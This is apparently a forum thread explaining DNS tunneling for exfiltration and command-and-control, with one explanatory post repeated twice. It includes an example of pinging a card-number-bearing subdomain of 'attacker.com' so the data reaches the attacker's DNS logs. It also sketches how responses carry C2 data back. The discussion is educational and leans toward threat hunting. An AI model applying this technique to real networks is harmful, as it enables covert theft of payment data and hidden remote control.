The magic of DNS tunneling is that it uses the normal methods of resolving names, so internal DNS servers/forwarders become proxy servers for the attacker's connection out to the Internet.
The most simple example someone gave me years ago was if someone wants to exfiltrate a credit card number, they can ping 4084515531278764-0424-789.attacker.com from an internal system. It doesn't matter if the ping succeeds. If the internal system gets a resolution response back from the internal DNS, the attacker has the card number in their DNS logs.
Tunneling TCP or other C2 traffic is just an extension of that which includes the attacker's DNS server sending a message (4 arbitrary bytes in the form of an IPv4 address, or more data in the form of a TXT record response, etc.) back to the internal system via the normal response path.
Its pretty clever, IMO. Most sysadmins think of DNS as being like a phonebook, but phonebooks are a single, supposedly authoritative source, and DNS is decentralized.
That really is pretty clever. Thanks a lot for explaining! Whish I could upvote multiple times.
I didn't even consider the normal resolver path because of caching,rate limits and perfmance but it's not like we're building a production protocol here, it just needs to work enough to facilitiate minimao communication.
This will make an interesting threar hunting excercise.
The most simple example someone gave me years ago was if someone wants to exfiltrate a credit card number, they can ping 4084515531278764-0424-789.attacker.com from an internal system. It doesn't matter if the ping succeeds. If the internal system gets a resolution response back from the internal DNS, the attacker has the card number in their DNS logs.
Tunneling TCP or other C2 traffic is just an extension of that which includes the attacker's DNS server sending a message (4 arbitrary bytes in the form of an IPv4 address, or more data in the form of a TXT record response, etc.) back to the internal system via the normal response path.
Its pretty clever, IMO. Most sysadmins think of DNS as being like a phonebook, but phonebooks are a single, supposedly authoritative source, and DNS is decentralized.